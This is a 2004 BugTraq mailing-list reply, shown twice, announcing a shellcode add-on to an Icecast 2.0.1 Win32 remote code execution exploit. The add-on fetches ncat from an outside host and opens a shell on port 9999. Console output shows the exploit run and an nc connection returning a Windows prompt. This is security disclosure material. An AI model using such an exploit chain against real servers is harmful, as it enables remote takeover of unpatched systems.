BugTraq
Back to list
|
Post reply
Re:2. Code execution in Icecast 2.0.1(exploit with shellcode)
Oct 02 2004 09:47AM
me delikon de
i added a shellcode which downloads NCAT from www.elitehaven.net.
this ncat spwans a shell on port 9999
------------------------------------------------------------------------
-
C:\>iceexec 127.0.0.1
Icecast <= 2.0.1 Win32 remote code execution 0.1
by Luigi Auriemma
e-mail: aluigi[at]altervista[d0t]org
web: http://aluigi.altervista.org
shellcode add-on by Delikon
www.delikon.de
- target 127.0.0.1:8000
- send malformed data
Server IS vulnerable!!!
C:\>nc 127.0.0.1 9999
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Icecast2 Win32>
------------------------------------------------------------------------
---
best regards, Delikon
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
i added a shellcode which downloads NCAT from www.elitehaven.net.
this ncat spwans a shell on port 9999
------------------------------------------------------------------------
-
C:\>iceexec 127.0.0.1
Icecast <= 2.0.1 Win32 remote code execution 0.1
by Luigi Auriemma
e-mail: aluigi[at]altervista[d0t]org
web: http://aluigi.altervista.org
shellcode add-on by Delikon
www.delikon.de
- target 127.0.0.1:8000
- send malformed data
Server IS vulnerable!!!
C:\>nc 127.0.0.1 9999
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Icecast2 Win32>
------------------------------------------------------------------------
---
best regards, Delikon
[ reply ]